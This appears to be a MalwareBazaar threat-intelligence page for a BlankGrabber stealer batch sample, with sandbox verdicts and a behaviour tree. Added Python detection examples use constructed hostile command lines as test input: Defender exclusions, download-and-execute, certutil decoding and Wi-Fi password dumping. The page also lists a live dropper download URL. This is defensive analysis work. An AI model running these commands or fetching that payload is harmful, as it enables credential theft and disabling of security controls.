MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 ee7e2e073f841e605c6573202b5318006314fed4264c1bfedb6753bf207b86cf. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

BlankGrabber

Vendor detections: 12

SHA256 hash: ee7e2e073f841e605c6573202b5318006314fed4264c1bfedb6753bf207b86cf
SHA3-384 hash: e12e18d6428fa67e3038599735d0ade97c818e8da9c1d7db219f12bedabdb5acce19b34aadba779734f53b2a3b1cb809
SHA1 hash: 622879209cabfd6c482aea18e7bec9b972e8a2c2
MD5 hash: 486631e567ea15d3d3fff51f9977362e
humanhash: london-artist-spring-fanta
File name: SystemUpdate_6616.bat
Signature: BlankGrabber
File size: 2,424 bytes
First seen: 2025-10-31 07:41:33 UTC
Last seen: Never
File type: Batch (bat)
MIME type: text/x-msdos-batch
ssdeep: 48:P4DY777x/64TfiSteiu5gXdm4j7GRoE9DbMJmstAt4tp:P4DdSteiu5gXgwGRoE9HkBeGp
TLSH: T1FE413D79A1DA0B2882200C70A87BED9213D9E5C7CFB8052BF5C591CA5EB831CCEE45E5
Magika: batch
Reporter: smica83
Tags: bat BlankGrabber

Intelligence


File Origin
# of uploads: 1
# of downloads: 69
Origin country: HU

Vendor Threat Intelligence

Malware family: n/a
ID: 1
File name: SystemUpdate_6616.bat
Verdict: Malicious activity
Analysis date: 2025-10-31 07:43:57 UTC
Tags: github blankgrabber auto-startup stealer anti-evasion python screenshot discord evasion pyinstaller susp-powershell generic ims-api

Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample.

Verdict: Malicious
Score: 97.4%
Tags: dropper shell sage

Result
Verdict: Malware
Behaviour
Launching a process
Creating a file
Running batch commands
Creating a file in the %temp% directory
Creating a window
Creating synchronization primitives
DNS request
Connection attempt
Sending a custom TCP request
Creating a file in the Windows subdirectories
Creating a process from a recently created file
Creating a process with a hidden window
Launching the process to change network settings
Loading a suspicious library
Using the Windows Management Instrumentation requests
Searching for synchronization primitives
Launching a file downloaded from the Internet
Adding an exclusion to Microsoft Defender
Gathering data
Verdict: Malicious
File Type: unix shell
First seen: 2025-10-31T04:58:00Z UTC
Last seen: 2025-10-31T16:54:00Z UTC
Hits: ~10
Detections: Trojan-PSW.MSIL.Stealer.sb, Trojan-Spy.Win32.Agent.dffz, Trojan-PSW.Python.Blank.sb, Trojan-Downloader.PowerShell.Agent.sb, Trojan.Win32.Agent.sb, Trojan.VBS.Runner.sb, Trojan.Win32.Dizemp.sb, Trojan.Win32.Agent.sba, Trojan.Python.Agent.gen, PDM:Trojan.Win32.Generic, HEUR:Trojan-PSW.Python.Blank.gen, HEUR:Trojan.BAT.Agent.gen
Result
Threat name: Blank Grabber
Detection: malicious
Classification: troj.spyw.expl.evad
Score: 100 / 100
Signatures:
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Multi AV Scanner detection for dropped file
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Capture Wi-Fi password
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Powershell download and execute file
Sigma detected: PowerShell DownloadFile
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Uses WMIC command to query system information (often done to detect virtual machines)
Writes or reads registry keys via WMI
Yara detected Blank Grabber
Yara detected Powershell download and execute
Behaviour
Behavior Graph (ID 1805582, sample SystemUpdate_6616.bat, start date 31/10/2025, architecture WINDOWS, score 100), rebuilt from the graph export as a process tree:

Top-level network: release-assets.githubusercontent.com; ip-api.com; 2 other IPs or domains
Top-level signatures: Sigma detected: Capture Wi-Fi password; Sigma detected: Powershell download and execute file; Yara detected Blank Grabber; 12 other signatures

cmd.exe (sample) - Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter); Suspicious powershell command line found; Encrypted powershell cmdline option found; 9 other signatures. Started: powershell.exe, conhost.exe, certutil.exe, 5 other processes
  powershell.exe - github.com (140.82.116.3:443, GITHUBUS, United States); release-assets.githubusercontent.com (185.199.111.133:443, FASTLYUS, Netherlands); dropped C:\Windows\Temp\twoman.exe (PE32+); Powershell drops PE file. Started: twoman.exe
    twoman.exe - dropped C:\Users\user\AppData\Local\Temp\...\rar.exe (PE32+), C:\Users\user\AppData\Local\...\rarreg.key (ASCII), C:\Users\user\AppData\...\unicodedata.pyd (PE32+), 22 other files (none is malicious); Multi AV Scanner detection for dropped file; Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; 3 other signatures. Started: twoman.exe
      twoman.exe - ip-api.com (208.95.112.1:80, TUT-ASUS, United States); discord.com (162.159.135.232:443, CLOUDFLARENETUS, United States); Tries to harvest and steal browser information (history, passwords, etc); Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; 4 other signatures. Started: cmd.exe (three instances), 24 other processes
        cmd.exe - Modifies Windows Defender protection settings; Removes signatures from Windows Defender. Started: powershell.exe (Loading BitLocker PowerShell Module), 2 other processes (including conhost.exe)
        cmd.exe - Uses WMIC command to query system information (often done to detect virtual machines). Started: 3 other processes (Queries sensitive video device information via WMI, Win32_VideoController)
        cmd.exe - Adds a directory exclusion to Windows Defender. Started: powershell.exe, conhost.exe
        24 other processes - Suspicious powershell command line found; Encrypted powershell cmdline option found; Tries to harvest and steal WLAN passwords. Started: tree.com (Queries sensitive network adapter information via WMI; Writes or reads registry keys via WMI), getmac.exe, powershell.exe, 45 other processes
          45 other processes - dropped C:\Users\user\AppData\Local\Temp\YTQqg.zip (RAR), C:\Users\user\AppData\...\5404fcfv.cmdline (Unicode). Started: csc.exe
            csc.exe - dropped C:\Users\user\AppData\Local\...\5404fcfv.dll (PE32). Started: cvtres.exe
  conhost.exe - Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter)
  certutil.exe - dropped C:\Users\user\AppData\Local\Temp\~obj_2.bat (DOS)
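The sandbox signatures above (encoded PowerShell touching MpPreference, PowerShell download-and-execute, ExecutionPolicy bypass, certutil decode, rar with a password and compression level, Wi-Fi password capture via netsh) are all visible in process-creation command lines. The Python below is an added example, not part of this MalwareBazaar entry and not any vendor's rule set: it decodes `-EncodedCommand` arguments (base64 over UTF-16LE) and runs a small set of regex rules, modelled on the Sigma titles listed here, over command lines. The command lines, rule names and regexes are my own constructions and approximations, not the actual Sigma rules or the sample's real command lines.

```python
import base64
import binascii
import re


def encode_powershell(script: str) -> str:
    """Produce the argument powershell.exe -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob. These are
# prefixes PowerShell accepts; rarer spellings are deliberately not covered here.
_ENC_FLAG = re.compile(
    r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an -EncodedCommand blob, else None."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


# My own approximations (not the Sigma rules) of detections named on this page.
# Each regex runs over the raw command line plus any decoded PowerShell payload.
RULES = {
    "defender_mppreference_tampering": re.compile(
        r"(?:Add|Set)-MpPreference\b.*?(?:-Exclusion(?:Path|Process|Extension)|-Disable\w+)",
        re.I | re.S),
    "powershell_download_and_execute": re.compile(
        r"(?:DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b).*?"
        r"(?:Start-Process|Invoke-Expression|\biex\b|\bsaps\b)",
        re.I | re.S),
    "executionpolicy_bypass": re.compile(
        r"[-/](?:ex|exec|executionpolicy|ep)\s+bypass", re.I),
    "certutil_decode_or_download": re.compile(
        r"certutil(?:\.exe)?\b.*?[-/](?:decode|decodehex|urlcache)", re.I | re.S),
    "rar_with_password_and_compression": re.compile(
        r"\b(?:rar|winrar)(?:\.exe)?\b(?=.*\s-h?p\S)(?=.*\s-m[0-5]\b)", re.I | re.S),
    "wifi_password_capture": re.compile(
        r"netsh\b.*?wlan\s+show\s+profiles?\b.*?key\s*=\s*clear", re.I | re.S),
}


def classify(cmdline: str) -> list:
    """Return the names of every rule that fires on one process command line."""
    decoded = decode_encoded_command(cmdline)
    hits = ["encoded_powershell_command"] if decoded is not None else []
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits.extend(name for name, rx in RULES.items() if rx.search(text))
    return hits


# Constructed command lines (not taken from the sample) shaped like the behaviours
# the sandboxes report, plus one benign line as a control.
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -Ep Bypass -Enc "
    + encode_powershell('Add-MpPreference -ExclusionPath "C:\\Windows\\Temp"'),
    "powershell -ep bypass -c \"(New-Object Net.WebClient).DownloadFile("
    "'https://example.invalid/twoman.exe','C:\\Windows\\Temp\\twoman.exe'); "
    "Start-Process C:\\Windows\\Temp\\twoman.exe\"",
    "certutil.exe -decode C:\\Users\\user\\AppData\\Local\\Temp\\~obj_2.bat "
    "C:\\Users\\user\\AppData\\Local\\Temp\\stage2.bat",
    "C:\\Users\\user\\AppData\\Local\\Temp\\rar.exe a -r -hpSecret -m5 "
    "C:\\Users\\user\\AppData\\Local\\Temp\\YTQqg.zip C:\\Users\\user\\AppData\\Local\\Temp\\loot",
    'netsh wlan show profile name="HomeWifi" key=clear',
    "powershell.exe -NoProfile -Command Get-Process",
]


def scan(cmdlines) -> dict:
    """Map each flagged command line to its rule hits; unflagged lines are omitted."""
    result = {}
    for line in cmdlines:
        hits = classify(line)
        if hits:
            result[line] = hits
    return result


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_CMDLINES).items():
        print(", ".join(hits), "<-", line[:90])
```

The decode step matters more than the regexes: the Defender exclusion in the first constructed line is invisible to a rule that only looks at the raw command line, which is why the Sigma titles on this page separately call out "Base64 Encoded MpPreference Cmdlet". The rar rule uses lookaheads so the `-p`/`-hp` and `-m` switches may appear in either order.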
Threat name: Script.Trojan.Malgent
Status: Malicious
First seen: 2025-10-31 07:42:32 UTC
File Type: Text (Batch)
AV detection: 2 of 23 (8.70%)
Threat level: 5/5

Result
Malware family: blankgrabber
Score: 10/10
Tags: family:blankgrabber collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx
Behaviour:
Delays execution with timeout.exe
Detects videocard installed
Gathers system information
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
System Network Configuration Discovery: Wi-Fi Discovery
Enumerates processes with tasklist
UPX packed file
Accesses cryptocurrency files/wallets, possible credential harvesting
Deobfuscate/Decode Files or Information
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Obfuscated Files or Information: Command Obfuscation
Clipboard Data
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Disables one or more Microsoft Defender components
Downloads MZ/PE file
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Malware Config
Dropper Extraction: https://github.com/gituhxd/uzigitdxd/releases/download/jkjkskskf/twoman.exe
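Several findings above ("Powershell drops PE file", "Downloads MZ/PE file", the dropped twoman.exe and rar.exe marked PE32+, 5404fcfv.dll marked PE32) rest on recognising a Windows executable by its headers rather than its name. The Python below is an added example, not code from this page or from any sandbox: it follows the DOS header's e_lfanew to the PE signature, reads the COFF machine field and the optional-header magic to tell PE32 (0x10b) from PE32+ (0x20b), and bounds-checks every offset so truncated input cannot raise. The file blobs it runs over are constructed minimal headers built in the block (assumption: the header walk alone is what the check needs; real files also carry sections and a full optional header).

```python
import struct

# Optional-header magic values and COFF machine types from the PE/COFF specification.
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
MACHINES = {0x14C: "i386", 0x8664: "AMD64", 0x1C0: "ARM", 0xAA64: "ARM64"}


def pe_info(data: bytes):
    """Return (kind, machine) such as ('PE32+', 'AMD64') for a PE blob, or None.

    Walks MZ header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> optional-header magic.
    Every offset is checked against len(data) before it is read.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # Need signature (4) + COFF header (20) + optional-header magic (2) = 26 bytes.
    if e_lfanew > len(data) - 26 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF header: Machine at +4, then 14 bytes we skip, SizeOfOptionalHeader at +20.
    machine, size_opt = struct.unpack_from("<H14xH", data, e_lfanew + 4)
    if size_opt < 2:
        return None  # object file or corrupt header: no optional header to read
    (magic,) = struct.unpack_from("<H", data, e_lfanew + 24)
    kind = {PE32_MAGIC: "PE32", PE32PLUS_MAGIC: "PE32+"}.get(magic)
    if kind is None:
        return None
    return kind, MACHINES.get(machine, f"0x{machine:04x}")


def is_pe(data: bytes) -> bool:
    """True when the blob parses as a PE32 or PE32+ image regardless of its file name."""
    return pe_info(data) is not None


def build_pe_stub(magic: int, machine: int, e_lfanew: int = 0x40) -> bytes:
    """Constructed minimal PE: DOS header, PE signature, COFF header, optional-header magic.

    Not a loadable image; it only exercises the header walk above.
    """
    dos = bytearray(max(e_lfanew, 0x40))
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Signature, Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (2: just the magic), Characteristics.
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", machine, 0, 0, 0, 0, 2, 0)
    return bytes(dos) + coff + struct.pack("<H", magic)


# Constructed stand-ins for dropped files (names borrowed from the graph, contents
# are synthetic headers): one PE32+, one PE32, a batch script, a truncated PE and
# an MZ stub whose e_lfanew points at garbage.
SAMPLE_FILES = {
    "twoman.exe": build_pe_stub(PE32PLUS_MAGIC, 0x8664),
    "5404fcfv.dll": build_pe_stub(PE32_MAGIC, 0x14C),
    "SystemUpdate_6616.bat": b"@echo off\r\nset x=1\r\n",
    "truncated.exe": build_pe_stub(PE32PLUS_MAGIC, 0x8664)[:0x50],
    "mz_no_pe.bin": b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"NOPE" + b"\0" * 22,
}


def scan_dropped(files: dict) -> dict:
    """Name -> (kind, machine) for every blob that parses as a PE image."""
    found = {}
    for name, blob in files.items():
        info = pe_info(blob)
        if info:
            found[name] = info
    return found


if __name__ == "__main__":
    for name, (kind, machine) in scan_dropped(SAMPLE_FILES).items():
        print(f"{name}: {kind} {machine}")
```

Checking the magic rather than the extension is what lets a sandbox label a file written by PowerShell as "PE32+" before it is ever executed; the same walk applied to a `.zip` that is really a RAR archive (as with YTQqg.zip above) would simply return None, which is itself a useful signal that the extension is lying.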
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar and against any suspicious process dumps they may create. Only results from TLP:CLEAR rules are displayed.

Rule name: Base64_Encoded_Powershell_Directives

Rule name: Certutil_Decode_OR_Download
Author: Florian Roth (Nextron Systems)
Description: Certutil Decode
Reference: Internal Research

Rule name: obfuscated_BAT
Author: @warz_s
Description: Identifies obfuscated BAT files
Reference: https://github.com/secwarz/YaraRules

File information


The table below shows additional information about this malware sample such as delivery method and external references.

BlankGrabber

Batch (bat)  ee7e2e073f841e605c6573202b5318006314fed4264c1bfedb6753bf207b86cf (this sample)
